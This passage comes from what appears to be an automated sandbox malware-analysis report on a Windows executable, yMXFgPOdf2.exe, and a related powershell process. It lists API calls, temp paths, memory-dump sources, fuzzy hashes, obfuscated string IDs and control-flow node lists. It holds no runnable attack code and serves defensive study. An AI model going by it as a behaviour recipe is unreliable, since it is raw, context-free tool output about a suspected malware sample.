                                                                  • Instruction Fuzzy Hash: 8EF0F870603620BFC621AB64FF4DA9B7A65FB44B12B95047AF141B11E4D7B848C1CBDD
                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 00404FEE
                                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 0040503F
                                                                    • Part of subcall function 00404032: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404044
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                  • String ID:
                                                                  • API String ID: 3748168415-3916222277
                                                                  • Opcode ID: d5165aaa8ddedbb0149cdff99e62f7242478f10d326129f832a6699438a9a539
                                                                  • Instruction ID: bbda00c2ce61db54858d54f75231ff4833bc9f24808a58ee1059b1aa4c9daed2
                                                                  • Opcode Fuzzy Hash: d5165aaa8ddedbb0149cdff99e62f7242478f10d326129f832a6699438a9a539
                                                                  • Instruction Fuzzy Hash: 44018F71100608AFDF318F11DD81AAF3A2AEB88354F104037FA00761D1CB7A8DA2DEA9
                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75923420,004036AE,004034F0,?), ref: 004036F0
                                                                  • GlobalFree.KERNEL32(?), ref: 004036F7
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004036E8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: Free$GlobalLibrary
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 1100898210-823278215
                                                                  • Opcode ID: af6bb57c9087681c5df9a6583299814f0cea52fc49ac98f0490cfdd2588b3981
                                                                  • Instruction ID: 839bfc3724c17aac1dd4b1c492512fede4cfaa3ffa2183060c5e8c58424d678e
                                                                  • Opcode Fuzzy Hash: af6bb57c9087681c5df9a6583299814f0cea52fc49ac98f0490cfdd2588b3981
                                                                  • Instruction Fuzzy Hash: 3AE0C233500020ABC6315F55FD0572EBB68AF4AB22F05842EE8807B3A087745C534FC8
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402DD3,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\yMXFgPOdf2.exe,C:\Users\user\Desktop\yMXFgPOdf2.exe,80000000,00000003,?,?,?,00000000,0040344F,?), ref: 0040583E
                                                                  • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DD3,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\yMXFgPOdf2.exe,C:\Users\user\Desktop\yMXFgPOdf2.exe,80000000,00000003,?,?,?,00000000,0040344F), ref: 0040584E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: CharPrevlstrlen
                                                                  • String ID: C:\Users\user\Desktop
                                                                  • API String ID: 2709904686-1246513382
                                                                  • Opcode ID: e38c69dbf87290b844468336b4ce525dd485480a3148f7863e3f2b8cc78cabd0
                                                                  • Instruction ID: e3b64cc9c476cb1f3dcb5ec7b95522af912f2f782a9e9cda297630c48d1e24bd
                                                                  • Opcode Fuzzy Hash: e38c69dbf87290b844468336b4ce525dd485480a3148f7863e3f2b8cc78cabd0
                                                                  • Instruction Fuzzy Hash: 1ED05EB3401D209AD3127704DC449DF63A8EF62300746846FE940A21A0D7785C908EA9
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405BAC,00000000,[Rename],00000000,00000000,00000000), ref: 00405982
                                                                  • lstrcmpiA.KERNEL32(00405BAC,00000000), ref: 0040599A
                                                                  • CharNextA.USER32(00405BAC,?,00000000,00405BAC,00000000,[Rename],00000000,00000000,00000000), ref: 004059AB
                                                                  • lstrlenA.KERNEL32(00405BAC,?,00000000,00405BAC,00000000,[Rename],00000000,00000000,00000000), ref: 004059B4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 190613189-0
                                                                  • Opcode ID: 8032f475193f702fb71f6f03d8a24b737fcdd57b3ef24890a40e5d8249ef00b0
                                                                  • Instruction ID: 74db543d3a7c556463c7df328d7f28d8c713d1c7c3b841aeb09eb3bbb428cad3
                                                                  • Opcode Fuzzy Hash: 8032f475193f702fb71f6f03d8a24b737fcdd57b3ef24890a40e5d8249ef00b0
                                                                  • Instruction Fuzzy Hash: F4F0F632205914FFD702DFA4CE0099FBBA8EF05364B2140B9E840FB210D674DE019FA8

                                                                  Execution Graph

                                                                  Execution Coverage:7%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:3
                                                                  Total number of Limit Nodes:0
                                                                  execution_graph 37843 77fc520 37844 77fc563 SetThreadToken 37843->37844 37845 77fc591 37844->37845
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2647967633.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$4'eq$4'eq$4'eq$4'eq$4'eq$4vl$4vl$tLkk$tLkk$tLkk$tLkk$tLkk$tLkk$x.jk$x.jk$x.jk$-jk$-jk
                                                                  • API String ID: 0-1204480521
                                                                  • Opcode ID: 0f83790492c9e4282dc353dd04e09a5d800da34a0b4f0dc1102e53bb0951062d
                                                                  • Instruction ID: 33da6521266eaad437e45189e8e10e844440f1885746a50d0eb939c311b10df5
                                                                  • Opcode Fuzzy Hash: 0f83790492c9e4282dc353dd04e09a5d800da34a0b4f0dc1102e53bb0951062d
                                                                  • Instruction Fuzzy Hash: 080371B4A00215DFD724DB68C951BEEB7B2AF85304F1084E9D919AB791CB31EE81CF91
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2633753911.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c252561b29e89700114dd3d30148eb6314ce0dfec264f6ea16bceddac9849d54
                                                                  • Instruction ID: e0f40e41f999cf398dc378d4e4b3b3306b57129b46a3a9787a95b9597768c741
                                                                  • Opcode Fuzzy Hash: c252561b29e89700114dd3d30148eb6314ce0dfec264f6ea16bceddac9849d54
                                                                  • Instruction Fuzzy Hash: A2418134A002449FDB19DF25C858ABD7BF6EF8D354F444469E416EB7A0CB34AC41DBA0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2647967633.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$4'eq$4'eq$4'eq$tLkk$tLkk$tLkk$tLkk$x.jk$x.jk$-jk$-jk
                                                                  • API String ID: 0-1649442026
                                                                  • Opcode ID: 5281976bb4355afb7a5c167fd9f017ce81d68b0ef7ec94e0cd6e6c68dc096e63
                                                                  • Instruction ID: 5211077037abd6f2c5035e562f2d2212addeaf0d03789a5a6061941786b869d5
                                                                  • Opcode Fuzzy Hash: 5281976bb4355afb7a5c167fd9f017ce81d68b0ef7ec94e0cd6e6c68dc096e63
                                                                  • Instruction Fuzzy Hash: 6CC285B4A012149FD724DF68C951BEEB7B2AF89304F1085A9D8196B791CB31EE81CF91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2647967633.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$tLkk$tPeq$tPeq$x.jk$-jk
                                                                  • API String ID: 0-251080171
                                                                  • Opcode ID: 235d122a8e3f277025aa84d0eb816b314e6b23f3470a6c906c7f9c83e4a7e533
                                                                  • Instruction ID: 93e6dc7332da402cf259af5822fbaa7a878eb5820cdc95cd08f32bf79567761f
                                                                  • Opcode Fuzzy Hash: 235d122a8e3f277025aa84d0eb816b314e6b23f3470a6c906c7f9c83e4a7e533
                                                                  • Instruction Fuzzy Hash: DAA2A2B0A00615CFDB24DF58C941BAABBB6EF85308F14C5A9D50AAB745CB31ED81CF91

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1402 7977302-7977318 1403 797731e-7977353 1402->1403 1404 79774cb-7977510 1402->1404 1403->1404 1409 7977359-797736f 1403->1409 1418 79767e5 1404->1418 1419 79767ec-797680d 1404->1419 1409->1404 1413 7977375-79773a6 1409->1413 1413->1404 1423 79773ac-79773f7 1413->1423 1418->1419 1420 7976a31-7976a52 1418->1420 1421 797680f-7976834 1419->1421 1422 797683c-7976849 1419->1422 1424 7976a54-7976a79 1420->1424 1425 7976a81-7976a8e 1420->1425 1421->1422 1422->1404 1426 797684f-7976862 1422->1426 1423->1404 1438 79773fd-7977417 1423->1438 1424->1425 1425->1404 1429 7976a94-7976ae9 1425->1429 1426->1404 1433 7976868-79768b3 1426->1433 1429->1404 1446 7976aef-7976b06 1429->1446 1433->1404 1445 79768b9-79768d0 1433->1445 1438->1404 1443 797741d-7977455 1438->1443 1443->1404 1453 7977457-7977471 1443->1453 1445->1404 1451 79768d6-797691e 1445->1451 1446->1404 1452 7976b0c-7976b41 1446->1452 1451->1404 1463 7976924-797693b 1451->1463 1452->1404 1460 7976b47-7976b5e 1452->1460 1453->1404 1457 7977473-79774bd 1453->1457 1457->1404 1474 7977515-79775f9 1457->1474 1460->1404 1466 7976b64-7976ba0 1460->1466 1463->1404 1470 7976941-7976995 1463->1470 1466->1404 1478 7976ba6-7976bdb 1466->1478 1470->1404 1484 797699b-79769b2 1470->1484 1479 79775fb-7977620 1474->1479 1480 7977628-7977635 1474->1480 1478->1404 1500 7976be1-7976bf8 1478->1500 1479->1480 1482 797763b-7977646 1480->1482 1483 7977809-7977813 1480->1483 1487 7977662 1482->1487 1488 7977648-797764e 1482->1488 1484->1404 1499 79769b8-7976a2a 1484->1499 1489 7977664-797766e 1487->1489 1491 7977654-7977656 1488->1491 1492 7977650-7977652 1488->1492 1489->1483 1493 7977674-797767c 1489->1493 1496 7977660 1491->1496 1492->1496 1497 7977694-79776a4 1493->1497 1498 797767e-7977684 1493->1498 1496->1489 1503 79776a6-79776ac 1497->1503 1504 79776be-79776c2 1497->1504 1501 7977686 1498->1501 1502 7977688-7977692 1498->1502 1499->1420 1500->1404 1511 7976bfe-7976c30 1500->1511 1501->1497 1502->1497 1507 79776b0-79776bc 1503->1507 1508 79776ae 1503->1508 1504->1483 1505 79776c8-79776e6 1504->1505 1515 7977700-7977721 1505->1515 1516 79776e8-79776ee 1505->1516 1507->1504 1508->1504 1511->1404 1523 7976c36-7976c81 1511->1523 1515->1483 1525 7977727-797772f 1515->1525 1518 79776f2-79776fe 1516->1518 1519 79776f0 1516->1519 1518->1515 1519->1515 1523->1404 1542 7976c87-7976c9e 1523->1542 1527 7977747-797774d 1525->1527 1528 7977731-7977737 1525->1528 1527->1483 1530 7977753-797778d 1527->1530 1532 797773b-7977745 1528->1532 1533 7977739 1528->1533 1540 79777a7-79777e8 1530->1540 1541 797778f-7977795 1530->1541 1532->1527 1533->1527 1540->1483 1543 7977797 1541->1543 1544 7977799-79777a5 1541->1544 1542->1404 1548 7976ca4-7976cdd 1542->1548 1543->1540 1544->1540 1548->1404 1553 7976ce3-7976cfa 1548->1553 1553->1404 1556 7976d00-7976d88 1553->1556 1562 7976db7-7976e69 1556->1562 1563 7976d8a-7976daf 1556->1563 1573 7977282-79772ad 1562->1573 1574 7976e6f-7976e9f 1562->1574 1563->1562 1582 79772b2-79772ff 1573->1582 1574->1573 1579 7976ea5-7976ec6 1574->1579 1583 7976ee0-7976ee8 1579->1583 1584 7976ec8-7976ece 1579->1584 1582->1404 1585 7976f02-7976f30 1583->1585 1586 7976eea-7976ef0 1583->1586 1588 7976ed2-7976ede 1584->1588 1589 7976ed0 1584->1589 1585->1573 1598 7976f36-7976f3b 1585->1598 1590 7976ef4-7976f00 1586->1590 1591 7976ef2 1586->1591 1588->1583 1589->1583 1590->1585 1591->1585 1600 7976f53-7976f5a 1598->1600 1601 7976f3d-7976f43 1598->1601 1600->1573 1602 7976f60-7976f68 1600->1602 1603 7976f47-7976f51 1601->1603 1604 7976f45 1601->1604 1605 7976f80-7976f8c 1602->1605 1606 7976f6a-7976f70 1602->1606 1603->1600 1604->1600 1605->1573 1610 7976f92-7976f97 1605->1610 1608 7976f74-7976f7e 1606->1608 1609 7976f72 1606->1609 1608->1605 1609->1605 1611 7976faf-7976fb9 1610->1611 1612 7976f99-7976f9f 1610->1612 1611->1573 1613 7976fbf-7976fda 1611->1613 1615 7976fa3-7976fad 1612->1615 1616 7976fa1 1612->1616 1619 7976ff4-7977019 1613->1619 1620 7976fdc-7976fe2 1613->1620 1615->1611 1616->1611 1619->1573 1625 797701f-797702d 1619->1625 1621 7976fe6-7976ff2 1620->1621 1622 7976fe4 1620->1622 1621->1619 1622->1619 1626 7977045-797706a 1625->1626 1627 797702f-7977035 1625->1627 1626->1573 1632 7977070-7977087 1626->1632 1628 7977037 1627->1628 1629 7977039-7977043 1627->1629 1628->1626 1629->1626 1632->1573 1634 797708d-79770bf 1632->1634 1634->1573 1637 79770c5-797712a 1634->1637 1637->1573 1642 7977130-79771c3 1637->1642 1642->1573 1652 79771c9-7977231 1642->1652 1652->1573 1658 7977233-7977239 1652->1658 1659 7977243-797724f 1658->1659 1660 7977259-7977280 1659->1660 1660->1582
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2647967633.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$4'eq$tLkk$tLkk$x.jk$-jk
                                                                  • API String ID: 0-967242774
                                                                  • Opcode ID: 692e1d24865ca1af3b70eefb1203262ae73239b65e9a9146b8a24a731644721e
                                                                  • Instruction ID: f3e1dda221361c5176d4d3170b6c3c44aad2205548403491c32651a34d747063
                                                                  • Opcode Fuzzy Hash: 692e1d24865ca1af3b70eefb1203262ae73239b65e9a9146b8a24a731644721e
                                                                  • Instruction Fuzzy Hash: 808291B4A00615DFDB20DF98C941BAAB7B2EF85304F14C9A9D51AAB741CB31ED81CF91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2654340763.00000000096F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 096F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_96f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fyl$(fyl$4'eq$4'eq$4'eq$4'eq$tPeq$tPeq$$eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq
                                                                  • API String ID: 0-4043009780
                                                                  • Opcode ID: 5264cb0ccf064722376017d73d99a391ba4fad6ec39c7df87a754a3ba8d3b00b
                                                                  • Instruction ID: 0b2a8c6dca9e1bcc3aefb5b11c6828a4c71cb9c5016a966d196a892a9fe5833a
                                                                  • Opcode Fuzzy Hash: 5264cb0ccf064722376017d73d99a391ba4fad6ec39c7df87a754a3ba8d3b00b
                                                                  • Instruction Fuzzy Hash: 7332F771B08205DFCB14CF68C561AAABBF2AF86390F25806AEA15DF355CB31DD41CB91

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1879 79774cd-79774cf 1880 79774db-7977510 1879->1880 1885 79767e5 1880->1885 1886 79767ec-797680d 1880->1886 1885->1886 1887 7976a31-7976a52 1885->1887 1888 797680f-7976834 1886->1888 1889 797683c-7976849 1886->1889 1890 7976a54-7976a79 1887->1890 1891 7976a81-7976a8e 1887->1891 1888->1889 1892 797684f-7976862 1889->1892 1893 79774cb-79774d0 1889->1893 1890->1891 1891->1893 1895 7976a94-7976ae9 1891->1895 1892->1893 1899 7976868-79768b3 1892->1899 1893->1880 1895->1893 1908 7976aef-7976b06 1895->1908 1899->1893 1907 79768b9-79768d0 1899->1907 1907->1893 1911 79768d6-797691e 1907->1911 1908->1893 1912 7976b0c-7976b41 1908->1912 1911->1893 1919 7976924-797693b 1911->1919 1912->1893 1917 7976b47-7976b5e 1912->1917 1917->1893 1921 7976b64-7976ba0 1917->1921 1919->1893 1924 7976941-7976995 1919->1924 1921->1893 1929 7976ba6-7976bdb 1921->1929 1924->1893 1931 797699b-79769b2 1924->1931 1929->1893 1936 7976be1-7976bf8 1929->1936 1931->1893 1935 79769b8-7976a2a 1931->1935 1935->1887 1936->1893 1939 7976bfe-7976c30 1936->1939 1939->1893 1944 7976c36-7976c81 1939->1944 1944->1893 1951 7976c87-7976c9e 1944->1951 1951->1893 1953 7976ca4-7976cdd 1951->1953 1953->1893 1956 7976ce3-7976cfa 1953->1956 1956->1893 1958 7976d00-7976d88 1956->1958 1964 7976db7-7976e69 1958->1964 1965 7976d8a-7976daf 1958->1965 1975 7977282-79772ad 1964->1975 1976 7976e6f-7976e9f 1964->1976 1965->1964 1984 79772b2-79772ff 1975->1984 1976->1975 1981 7976ea5-7976ec6 1976->1981 1985 7976ee0-7976ee8 1981->1985 1986 7976ec8-7976ece 1981->1986 1984->1893 1987 7976f02-7976f30 1985->1987 1988 7976eea-7976ef0 1985->1988 1990 7976ed2-7976ede 1986->1990 1991 7976ed0 1986->1991 1987->1975 2000 7976f36-7976f3b 1987->2000 1992 7976ef4-7976f00 1988->1992 1993 7976ef2 1988->1993 1990->1985 1991->1985 1992->1987 1993->1987 2002 7976f53-7976f5a 2000->2002 2003 7976f3d-7976f43 2000->2003 2002->1975 2004 7976f60-7976f68 2002->2004 2005 7976f47-7976f51 2003->2005 2006 7976f45 2003->2006 2007 7976f80-7976f8c 2004->2007 2008 7976f6a-7976f70 2004->2008 2005->2002 2006->2002 2007->1975 2012 7976f92-7976f97 2007->2012 2010 7976f74-7976f7e 2008->2010 2011 7976f72 2008->2011 2010->2007 2011->2007 2013 7976faf-7976fb9 2012->2013 2014 7976f99-7976f9f 2012->2014 2013->1975 2015 7976fbf-7976fda 2013->2015 2017 7976fa3-7976fad 2014->2017 2018 7976fa1 2014->2018 2021 7976ff4-7977019 2015->2021 2022 7976fdc-7976fe2 2015->2022 2017->2013 2018->2013 2021->1975 2027 797701f-797702d 2021->2027 2023 7976fe6-7976ff2 2022->2023 2024 7976fe4 2022->2024 2023->2021 2024->2021 2028 7977045-797706a 2027->2028 2029 797702f-7977035 2027->2029 2028->1975 2034 7977070-7977087 2028->2034 2030 7977037 2029->2030 2031 7977039-7977043 2029->2031 2030->2028 2031->2028 2034->1975 2036 797708d-79770bf 2034->2036 2036->1975 2039 79770c5-797712a 2036->2039 2039->1975 2044 7977130-79771c3 2039->2044 2044->1975 2054 79771c9-7977231 2044->2054 2054->1975 2060 7977233-797724f 2054->2060 2062 7977259-7977280 2060->2062 2062->1984
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2647967633.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$4'eq$tLkk$x.jk$-jk
                                                                  • API String ID: 0-1258555554
                                                                  • Opcode ID: 4f79731657708657a3cf339f0dc90b3be79f0e2be057e099c938f173ba3c3157
                                                                  • Instruction ID: 3df20678c5885e60ab718f176df2dab1a60769f62cd02eb544a581fa421a1765
                                                                  • Opcode Fuzzy Hash: 4f79731657708657a3cf339f0dc90b3be79f0e2be057e099c938f173ba3c3157
                                                                  • Instruction Fuzzy Hash: F0527FB4A00614DFDB20DF54C951B9EBBB2EF85308F1489A9D90A6B741CB31EE81CF91

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 2065 797d439-797d43a 2066 797d446-797d47b 2065->2066 2071 797c7c3 2066->2071 2072 797c7ca-797c7eb 2066->2072 2071->2072 2073 797c9ed-797ca0e 2071->2073 2074 797c7ed-797c812 2072->2074 2075 797c81a-797c827 2072->2075 2076 797ca10-797ca35 2073->2076 2077 797ca3d-797ca4a 2073->2077 2074->2075 2078 797d436-797d43b 2075->2078 2079 797c82d-797c844 2075->2079 2076->2077 2077->2078 2080 797ca50-797caa7 2077->2080 2078->2066 2079->2078 2086 797c84a-797c895 2079->2086 2080->2078 2094 797caad-797cac4 2080->2094 2086->2078 2093 797c89b-797c8ae 2086->2093 2093->2078 2097 797c8b4-797c8f4 2093->2097 2094->2078 2098 797caca-797caf8 2094->2098 2097->2078 2105 797c8fa-797c911 2097->2105 2098->2078 2103 797cafe-797cb11 2098->2103 2103->2078 2107 797cb17-797cb53 2103->2107 2105->2078 2109 797c917-797c95d 2105->2109 2107->2078 2115 797cb59-797cb94 2107->2115 2109->2078 2117 797c963-797c976 2109->2117 2115->2078 2121 797cb9a-797cbad 2115->2121 2117->2078 2122 797c97c-797c9e6 2117->2122 2121->2078 2125 797cbb3-797cbe1 2121->2125 2122->2073 2125->2078 2131 797cbe7-797cc2c 2125->2131 2131->2078 2137 797cc32-797cc4c 2131->2137 2137->2078 2139 797cc52-797cc8a 2137->2139 2139->2078 2142 797cc90-797ccaa 2139->2142 2142->2078 2144 797ccb0-797cd3b 2142->2144 2150 797cd3d-797cd62 2144->2150 2151 797cd6a-797ce50 2144->2151 2150->2151 2164 797d1f6-797d221 2151->2164 2165 797ce56-797ce6e 2151->2165 2177 797d226-797d273 2164->2177 2168 797ce70-797ce76 2165->2168 2169 797ce88-797ceba 2165->2169 2170 797ce7a-797ce86 2168->2170 2171 797ce78 2168->2171 2169->2164 2178 797cec0-797ceda 2169->2178 2170->2169 2171->2169 2177->2078 2178->2164 2181 797cee0-797cf1b 2178->2181 2181->2164 2187 797cf21-797cf3b 2181->2187 2187->2164 2189 797cf41-797cf76 2187->2189 2189->2164 2192 797cf7c-797cfb1 2189->2192 2192->2164 2195 797cfb7-797cfd1 2192->2195 2195->2164 2197 797cfd7-797d00c 2195->2197 2197->2164 2200 797d012-797d07a 2197->2200 2200->2164 2205 797d080-797d126 2200->2205 2205->2164 2215 797d12c-797d1a9 2205->2215 2215->2164 2221 797d1ab-797d1b1 2215->2221 2222 797d1bb-797d1c7 2221->2222 2223 797d1d1-797d1f4 2222->2223 2223->2177
                                                                  Strings
                                                                  Memory Dump Source
